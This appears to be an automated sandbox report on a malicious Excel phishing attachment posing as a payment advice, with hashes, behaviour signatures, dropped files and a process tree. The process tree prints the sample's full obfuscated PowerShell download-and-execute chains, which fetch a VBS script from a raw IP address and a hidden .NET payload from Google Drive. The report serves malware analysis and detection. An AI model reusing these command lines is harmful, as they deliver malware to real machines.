Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-11-2024 06:49

General

  • Target

    Payment Advice-Ref[A22D4YdWsbE4].xla.xls

  • Size

    937KB

  • MD5

    b01b76c877321d03dab23c4d1bb26e48

  • SHA1

    faf698726f93f31fc1fcab31e8942d690220fa10

  • SHA256

    421895be443167f773741e1681d27ba2052fbef90d4def330cadb3206dbd651c

  • SHA512

    6756a5eefa442726525208796c7406146407be1a779655a647cdd3caa38a5c761848caf5a978e4cd612713aaef9307221411372859dffa82c860d723b307fc64

  • SSDEEP

    12288:2UXN9WeWy3aJwF1E3Zjy5dbHsu6KGsW+DYavtKVUgGw6M6ozBdUepzBf88SKe:fusaGF1EpyYu67sdDNVK+f9oTptaK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice-Ref[A22D4YdWsbE4].xla.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2828
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Windows\SysWOW64\WiNdOwSPowERShELL\V1.0\POweRSHELL.eXE
      "C:\Windows\SystEm32\WiNdOwSPowERShELL\V1.0\POweRSHELL.eXE" "POweRSheLl.ExE -Ex BYpASS -NOp -w 1 -c devICEcrEdenTIAlDeploymEnt.Exe ; iEX($(iex('[SYsTeM.texT.encODInG]'+[cHAR]58+[ChaR]58+'utf8.GETsTriNg([sYSTEM.coNVERT]'+[ChAR]0x3a+[CHar]58+'fROMbASe64StRINg('+[chAr]34+'JHFZZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJkRWZpTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5YWFac1VaeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDWGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENMVUZDQix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlEelp3aSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRZGhFS0lReEpvKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRE1kQWZZamhGSk0iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGx5S2JlaVhFUWRqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxWWY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQuMjMvMTIwL2JpZ25ld3N3aXRoZ3JlYXRjYXJld2l0aGdyZWF0bmV3c2NvaW4udElGIiwiJEVudjpBUFBEQVRBXGJpZ25ld3N3aXRoZ3JlYXRjYXJld2l0aGdyZWF0bmV3c2NvaW4udkJzIiwwLDApO3N0QXJULVNsZUVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxiaWduZXdzd2l0aGdyZWF0Y2FyZXdpdGhncmVhdG5ld3Njb2luLnZCcyI='+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASS -NOp -w 1 -c devICEcrEdenTIAlDeploymEnt.Exe
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1324
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n_jrph9h.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2296
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC147A.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2440
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bignewswithgreatcarewithgreatnewscoin.vBs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSXpiaW1hZ2VVcmwgPSBVMkVodHRwczovL2RyaScrJ3ZlLmdvb2dsZS5jb20nKycvdWM/ZXhwb3J0PScrJ2Rvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0wnKydsMXQyU3RWZ0d4YicrJ1N0MCBVMkU7SXpid2ViQ2xpZW50ID0gTicrJ2V3LU9iamVjdCAnKydTeXN0ZW0uTmV0LldlYkNsaScrJ2VudDtJemJpbWFnZUJ5dGVzID0gSXpid2ViQ2xpZW50LkRvd25sb2FkRGF0YShJemJpbWEnKydnZVVybCk7SXpiaW1hZ2VUZXh0ID0gW1N5cycrJ3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoSXpiaW1hZ2VCeXRlcyk7SXpic3RhcnRGbGFnID0gVTJFPDxCQVNFNjRfU1RBUlQ+PlUyRTtJemJlbmRGbGFnID0gVTJFPDxCQVNFNjRfRU5EPj5VMkU7SXpic3RhJysncnRJbmRleCA9IEl6YmltYWdlVGV4dC5JJysnbmRlJysneE9mKEl6YnN0YXJ0RmxhZyk7SXpiZW5kJysnSW5kZXggPSBJemInKydpbWFnZVRleHQuSW5kZXhPZihJemJlbmRGbGFnKTtJemJzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgSXpiZW5kSW5kZXggLWd0IEl6YnN0YXJ0SW5kZXg7SScrJ3pic3RhcnRJbmRleCArPSBJemJzdGFydEZsYWcuTGVuZ3RoO0l6YmJhc2U2NExlbmd0aCA9IEl6YmVuZEluZGV4IC0gSXpic3RhcnRJbmRleDtJemJiYXNlNjRDJysnb21tYW5kID0gSXpiaW1hZ2VUZXh0LlN1YnN0cmknKyduZyhJemJzdGEnKydydEluZGV4LCBJemJiYXNlNjRMZW5ndGgpO0l6YmJhc2U2NFJldmVyJysnc2VkICcrJz0gLWpvaW4gKEl6YmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBDZnYgRm9yRWFjaC1PYmplY3QgeyBJemJfIH0pWy0nKycxLi4tKEl6YmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07SXpiY29tbWFuZEJ5JysndGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluJysnZygnKydJemJiYXNlNjRSZXZlcnMnKydlZCk7SXpibG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEl6YmNvbScrJ21hbmRCeXRlcyk7SXpidmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChVJysnMkVWQUlVMkUpO0l6YnZhaU1ldCcrJ2hvZC5JbnZva2UoSXpibnVsbCwgQChVMkV0eHQuUlRNTUFDLzAyMS8zMi40LjM3MS43MDEvLzpwdHRoVTJFLCBVMkVkZScrJ3NhdGl2YWRvVTJFLCBVMkVkZXNhdGl2YWQnKydvVTJFLCBVMkVkZXNhdGl2YWQnKydvVTJFLCBVMkVhc3BuZXRfcmVnYnJvd3NlcnNVMkUsICcrJ1UyRWRlc2F0aScrJ3ZhZG9VMkUsIFUyRWRlc2F0aXZhZG9VMkUsVTJFZGVzYXRpdmFkb1UyRSxVMkVkJysnZXNhdGl2YWRvVTJFLFUyRWRlc2F0aXZhZG9VMkUsVTJFZGVzYXRpdmFkb1UyRSxVMkVkZXNhdGl2YWRvVTJFLFUyRTEnKydVMkUsVTJFZGVzYXRpdmFkb1UyRSkpOycpIC1DckVQbEFDRSAgKFtjaGFyXTczK1tjaGFyXTEyMitbY2hhcl05OCksW2NoYXJdMzYgIC1SZXBMQWNFKFtjaGFyXTg1K1tjaGFyXTUwK1tjaGFyXTY5KSxbY2hhcl0zOSAgLUNyRVBsQUNFICAoW2NoYXJdNjcrW2NoYXJdMTAyK1tjaGFyXTExOCksW2NoYXJdMTI0KXwmICggJHNoRWxMaWRbMV0rJHNoZWxMSURbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('IzbimageUrl = U2Ehttps://dri'+'ve.google.com'+'/uc?export='+'download&id=1UyHqwrnXClKBJ3j63L'+'l1t2StVgGxb'+'St0 U2E;IzbwebClient = N'+'ew-Object '+'System.Net.WebCli'+'ent;IzbimageBytes = IzbwebClient.DownloadData(Izbima'+'geUrl);IzbimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(IzbimageBytes);IzbstartFlag = U2E<<BASE64_START>>U2E;IzbendFlag = U2E<<BASE64_END>>U2E;Izbsta'+'rtIndex = IzbimageText.I'+'nde'+'xOf(IzbstartFlag);Izbend'+'Index = Izb'+'imageText.IndexOf(IzbendFlag);IzbstartInde'+'x -ge 0 -and IzbendIndex -gt IzbstartIndex;I'+'zbstartIndex += IzbstartFlag.Length;Izbbase64Length = IzbendIndex - IzbstartIndex;Izbbase64C'+'ommand = IzbimageText.Substri'+'ng(Izbsta'+'rtIndex, Izbbase64Length);Izbbase64Rever'+'sed '+'= -join (Izbbase64Command.ToCharArray() Cfv ForEach-Object { Izb_ })[-'+'1..-(Izbbase64Command.Length)];IzbcommandBy'+'tes = [System.Convert]::FromBase64Strin'+'g('+'Izbbase64Revers'+'ed);IzbloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(Izbcom'+'mandBytes);IzbvaiMethod = [dnlib.IO.Home].GetMethod(U'+'2EVAIU2E);IzbvaiMet'+'hod.Invoke(Izbnull, @(U2Etxt.RTMMAC/021/32.4.371.701//:ptthU2E, U2Ede'+'sativadoU2E, U2Edesativad'+'oU2E, U2Edesativad'+'oU2E, U2Easpnet_regbrowsersU2E, '+'U2Edesati'+'vadoU2E, U2EdesativadoU2E,U2EdesativadoU2E,U2Ed'+'esativadoU2E,U2EdesativadoU2E,U2EdesativadoU2E,U2EdesativadoU2E,U2E1'+'U2E,U2EdesativadoU2E));') -CrEPlACE ([char]73+[char]122+[char]98),[char]36 -RepLAcE([char]85+[char]50+[char]69),[char]39 -CrEPlACE ([char]67+[char]102+[char]118),[char]124)|& ( $shElLid[1]+$shelLID[13]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1680

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    67e486b2f148a3fca863728242b6273e

    SHA1

    452a84c183d7ea5b7c015b597e94af8eef66d44a

    SHA256

    facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

    SHA512

    d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    7c61a7f5339275ef472fb7914ee75c7b

    SHA1

    dba911d9314dc01bbe402d34677cccbd71264294

    SHA256

    0330200a4df37d5e786ab6e9875300b91decadd0e73844bdece81f07115d0df9

    SHA512

    cd0b06dde9db9bbebfe445dd877a9020f90945ad1f4ec23bc7b63a6b5505ac13291a94d590695cecc9fe3f0eb936fca944e66679b9d42a39268a615448449197

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5b9cbd95bbec8d5848de94e6c7d4cc3f

    SHA1

    64898381e9873673388403535a5ddb8cffee76f3

    SHA256

    d8323f1ee00e17423a2d30a7acbedd911edc2e575815e0cf692a2bac4fbdd2f2

    SHA512

    421721c824ead4e82f02e65f8b81341bdec8686ca2dd88064c9259dc573d4958fcebd6929732f51a6c17de7acd4f9615e318a4b5d351b41e583fcbc1ab0f0014

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    c2c2cf415cf606089c6847dcca50b940

    SHA1

    14f7701663fc23403ae5c7c388d4491822db6992

    SHA256

    ebad3b26574a317f18efc291f4d1e4e3b9457be69137b445e709ff63fe7b16b0

    SHA512

    49fc76af720ca463bdd41241905bfc90cbd519328ce6bffedd53a6c67b62832f210707618efc67b6484e455e68508140da5dbb149ee351392ba1edde976ebd49

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\givingbestthignswithgreatheatcaptialthingstodo[1].hta

    Filesize

    8KB

    MD5

    353f7a90e348a8d2bdfb43ab66c346a8

    SHA1

    8c3fe6f75902b08c86e41bf1be160e4440365040

    SHA256

    7d2d9436fafa26b4154db9f3f6cf4ed556a84d0483824b729ecff072c16fc3b2

    SHA512

    2a7fef9cdc269696185a3a48679a5bac15cfe9d26325eec7fb08a68f24b60445b4f30fdc87dd3116d613b1619e0dd169e3f93f48c8c3aaf4760b67c8740d23b9

  • C:\Users\Admin\AppData\Local\Temp\Cab906.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES147B.tmp

    Filesize

    1KB

    MD5

    d956e6997f0d527abeca632fe87017df

    SHA1

    96a9f86e0d216075ecce5161b0efa974a93d738b

    SHA256

    10d0c9821b3c4f53bc06322ecff0256fc208a1a7f2bd0f8283130284696993d1

    SHA512

    986c6c83a5f7e94d39713ac147064a0e27314965f3e0bdc2507d892aff288d12adc2ba693efbed2eeb1b0f2def14939e5a4ec578a88211e30b1e7e8060d5691f

  • C:\Users\Admin\AppData\Local\Temp\n_jrph9h.dll

    Filesize

    3KB

    MD5

    b7eca87ac69848eb75da35c68a3dd78f

    SHA1

    f9d7fec1b81e794ac03ce4f826cf4055de683469

    SHA256

    406a98ec6517d9a3bed0681227628047daf218741464f89afaae73d9d687a053

    SHA512

    6a9133761710dd0a936d3a721837f6d854a8eeb446d3c8c8711196b89f8ee7f5964ae0f8eb56180a3eaa170c150f4b26700da288aab13fe42824f1cd38b73d46

  • C:\Users\Admin\AppData\Local\Temp\n_jrph9h.pdb

    Filesize

    7KB

    MD5

    d312c440538a41b29e6d3fc49817f45f

    SHA1

    bedcb61ac95c5ed0ecdde4b84b2e9023d8feae11

    SHA256

    deceac9bceb84e59178295691d72ca3449fd4f15370fe7b74c3e2934ddc97a86

    SHA512

    c149d26dcde61cd2218d3d21f3187b1eceeedfb537d29c196e6ca2ea7252e8f19f1fb079dfded6d4b5c19740f599e84b6a5562dfcf22c5e95899251a2f0fa02d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    7da02ce1a96c296fd57b9b817bb9fe43

    SHA1

    a1975964432c9c2bbc714d2dc60015fa80b18e71

    SHA256

    826c76784daeaa81842c5a6373c67d87a8fdc918af167d572156953cc1461759

    SHA512

    29435d33c92a6de91ee856182e94daf90be1c35dd1f18c44c5f86919b697e1fedbca3b21b407ff991912a9c829134438b5938c412ba9e403daebd9e205a40e8f

  • C:\Users\Admin\AppData\Roaming\bignewswithgreatcarewithgreatnewscoin.vBs

    Filesize

    138KB

    MD5

    1218c95ec6f264e88b7d898fd0fc6d42

    SHA1

    94f31297300031173e7b4364871c01bbcc9c140a

    SHA256

    5c621ae89965e84bdcff75fbaf673fd46bed97af61515194c2404eab8adc0222

    SHA512

    e7fa2ec9f9f3b316237daa3e49624b3cb2335e21b2ebcff960bf6761db929965e385b19d30d883ba7f00d506a5bb548adf92d1d2793b6e0c109087acf3b4e094

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC147A.tmp

    Filesize

    652B

    MD5

    0dfcc0dc15a11ea12beb7c8b05849d77

    SHA1

    ef6fc528951e538ab45464501c88daa45385dd32

    SHA256

    5f64497e5116ac58b710db0e613a34812524bbe42ab960e457db029ea70c5b97

    SHA512

    59d941dd313ab1fea05d639de64bff6b42d1d67fe7403bb940c397013f7ac9cf01fdc07896e93775309b7ce5b62e7e828667c16eec20e74a6f657976fe53fc16

  • \??\c:\Users\Admin\AppData\Local\Temp\n_jrph9h.0.cs

    Filesize

    494B

    MD5

    15c5338a5204b04ba2db22fee2cf4c74

    SHA1

    8be6a8dd7a0c1b2aa7726fd38ce299c91a8ea675

    SHA256

    ad491871f4a69a0125d1d563d68c4d458d271c5e3f0e818be0ba0100a462af39

    SHA512

    70720287371d0964f027d369f01f8ac84eaa1cb92306025076a0be564e3a40a65096b5206e8b2fa5c8290779dd34de28b4cb63c1a1e362407f9f5a6bb9bcdc1e

  • \??\c:\Users\Admin\AppData\Local\Temp\n_jrph9h.cmdline

    Filesize

    309B

    MD5

    2732594f4d1e33ad621a6e65a9a6971d

    SHA1

    cba5c76057759f871a871f9853f0003230faff1f

    SHA256

    434a11a268bd4b232a155678ab7469011bc151c29b7ff87282645cf19924c3c0

    SHA512

    b42b9676c4343b71b844921d53d487ebf96465525c1cc9fa9f0772b62a640ea856962914e5d3642c20ee7d93c5d32d707901c523bfd75bf330d3cd92d2cf1aaf

  • memory/2572-18-0x0000000000EC0000-0x0000000000EC2000-memory.dmp

    Filesize

    8KB

  • memory/2828-1-0x0000000072A2D000-0x0000000072A38000-memory.dmp

    Filesize

    44KB

  • memory/2828-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2828-19-0x0000000002420000-0x0000000002422000-memory.dmp

    Filesize

    8KB

  • memory/2828-76-0x0000000072A2D000-0x0000000072A38000-memory.dmp

    Filesize

    44KB